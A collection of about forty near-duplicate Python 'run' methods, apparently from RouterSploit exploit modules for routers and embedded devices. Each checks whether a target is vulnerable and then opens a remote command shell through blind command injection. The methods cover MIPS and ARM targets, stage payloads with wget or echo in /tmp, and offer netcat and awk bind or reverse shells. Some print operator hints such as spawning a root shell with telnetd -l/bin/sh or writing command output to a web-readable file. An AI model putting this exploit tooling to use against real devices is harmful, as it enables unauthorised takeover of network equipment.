def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="none", method="awk", binary="awk") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command shell") shell(self) else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mips") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsel", method="wget", binary="wget", location="/var") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsle") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("This is blind command injection, response is not available") shell(self, architecture="mips", binary="netcat", shell="/bin/sh") else: print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status( "This is blind command injection, response is not available") shell(self, architecture="mips", binary="netcat", shell="/bin/sh") else: print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection, response is not available") shell(self, architecture="mipsle", method="echo", binary="echo", location="/var/tmp/") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>") shell(self, architecture="mipsbe", method="wget", binary="wget", location="/tmp") else: print_error("Exploit failed. Device seems to be not vulnerable.")
def run(self): if self.check(): print_status("Target might be vulnerable - it is hard to verify") print_status("Invoking command loop...") print_status("It is blind command injection, response is not available") shell(self, architecture="mipsle") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): print_status( "It's not possible to check if the target is vulnerable. Try to use following command loop." ) print_status("Invoking command loop...") print_status( "It is blind command injection, response is not available") shell(self, architecture="mipsle")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection, response is not available") shell(self, architecture="mipsle", method="echo", location="/var/tmp/") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is probably vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection. Try to start telnet with telnet telnetd -p '4445'") shell(self, architecture="arm") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target appears to be vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available. Command length up to 28 characters.") shell(self, architecture="mips") else: print_error("Target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable!") print_status("Invoking command loop...") shell(self, architecture="mipsle", method="echo", location="/tmp", echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available") shell(self, architecture="mips") else: print_error("Target is not vulnerable")
def run(self): if self.login(): print_success("Target seems to be vulnerable") self.info() print_status("Invoking command loop") shell(self, architecture="mipsbe", method="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_status("Target might be vulnerable - difficult to verify") print_status("Invoking command loop...") print_status("It is blind command injection, response is not available.") print_status("Spawn root shell with telnetd -l/bin/sh") shell(self, architecture="mips") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status( "It is blind command injection - response is not available") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def run(self): if self.login(): print_success("Target seems to be vulnerable") self.info() print_status("Invoking command loop") shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): """ Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target. """ if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command shell") print_status("It is blind command injection so response is not available") # requires testing shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target appears to be vulnerable") if self.test_auth(): print_status("Invoking command loop...") print_status("This is blind command injection. Response is not available.") shell(self, architecture="mipsel") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is probably vulnerable") print_status("Invoking command loop...") print_status( "It is blind command injection. Try to start telnet with telnet telnetd -p '4445'" ) shell(self, architecture="arm") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target appears to be vulnerable") print_status("Invoking command loop...") print_status( "It is blind command injection - response is not available. Command length up to 28 characters." ) shell(self, architecture="mips") else: print_error("Target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("This is blind command injection, response is not available") shell(self, architecture="generic", method="netcat", payloads=["netcat_bind_tcp", "netcat_reverse_tcp"]) else: print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self): if self.check(): print_status("Target might be vulnerable - difficult to verify") print_status("Invoking command loop...") print_status( "It is blind command injection, response is not available.") print_status("Spawn root shell with telnetd -l/bin/sh") shell(self, architecture="mipsbe") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="generic", method="awk", payloads=["awk_bind_tcp", "awk_reverse_tcp"]) else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success('Target is vulnerable') print_status('Blind command injection - response is not available') print_status('Possible extraction point:') print_status('\t- Inject "CMD > /usr/share/www/routersploit.check"') print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port)) print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...") shell(self, architecture="mipsbe") else: print_error('Target is not vulnerable')
def run(self): if self.check(): print_success('Target is vulnerable') print_status('Blind command injection - response is not available') print_status('Possible extraction point:') print_status('\t- Inject "CMD > /usr/share/www/routersploit.check"') print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port)) print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...") shell(self, architecture='mips') else: print_error('Target is not vulnerable')
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status( "This is blind command injection, response is not available") shell(self, architecture="generic", method="netcat", payloads=["netcat_bind_tcp", "netcat_reverse_tcp"]) else: print_error("Exploit failed - exploit seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command shell") print_status( "It is blind command injection so response is not available") # requires testing shell(self, architecture="mipsbe", method="wget", location="/tmp") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): try: if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("Please note that only first 256 characters of the output will be displayed or use reverse_tcp") shell(self, architecture="arm", method="wget", binary="wget", location="/tmp") else: print_error("Target is not vulnerable") except socket.error as ex: print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=9999))
def run(self): if self.check(): print_success("Target appears to be vulnerable") if self.test_auth(): print_status("Invoking command loop...") print_status( "This is blind command injection. Response is not available." ) shell(self, architecture="mipsel") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available. Use reverse_tcp <reverse ip> <port>") if self.arch == "mipsbe": shell(self, architecture="mips", method="wget", binary="wget", location="/tmp") elif self.arch == "mipsle": shell(self, architecture="mipsel", method="wget", binary="wget", location="/tmp") else: print_error("Target is not vulnerable")
def run(self): try: if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("Please note that only first 256 characters of the " "output will be displayed or use reverse_tcp") shell(self, architecture="arm", method="wget", binary="wget", location="/tmp") else: print_error("Target is not vulnerable") except socket.error as ex: print_error("Socket error ({ex}). It most likely means that something " "else is listening locally on port UDP:{port}. Make sure to " "kill it before running the exploit again.".format(ex=ex, port=9999))
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status( "It is blind command injection - response is not available") if self.arch == "mipsbe": shell(self, architecture="mipsbe", method="wget", location="/tmp") elif self.arch == "mipsle": shell(self, architecture="mipsle", method="wget", location="/tmp") else: print_error("Target is not vulnerable")
def run(self): print_status("It's not possible to check if the target is vulnerable. Try to use following command loop.") print_status("Invoking command loop...") print_status("It is blind command injection, response is not available") shell(self, architecture="mipsle")
def run(self): print_status("It is not possible to check if target is vulnerable") print_status("Trying to invoke command loop...") print_status("It is blind command injection. Response is not available.") shell(self, architecture="mipsbe")